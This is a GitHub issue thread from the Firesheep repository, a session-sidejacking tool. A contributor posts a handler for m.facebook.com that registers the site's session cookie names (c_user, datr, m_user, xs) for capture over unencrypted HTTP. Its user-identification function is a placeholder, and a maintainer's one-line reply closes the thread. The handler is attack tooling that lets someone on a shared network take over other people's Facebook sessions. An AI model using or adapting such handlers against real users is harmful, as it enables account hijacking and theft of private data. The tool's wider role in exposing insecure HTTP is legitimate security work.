### ISSUE TITLE
Handler for m.facebook.com

### ISSUE THREAD

**Issue by joswr1ght** [codebutler/firesheep#164]
Facebook's m.facebook.com site, accessed through iOS Safari or through the Apple App Store Facebook app is vulnerable to sidejacking.  Here is a handler, though I don't know how to write the DOM handler function for the username.

// Author:
//   Joshua Wright jwright@willhackforsushi.com
register({
  name: 'm.facebook.com',
  url: 'http://m.facebook.com/',
  domains: [ 'facebook.com' ],
  sessionCookieNames: [ 'c_user', 'datr', 'm_user', 'xs' ],

  identifyUser: function() { 
    this.userName = "unknown";
  }
});

**Comment by codebutler** [comment]
Please re-open if this handler still works.
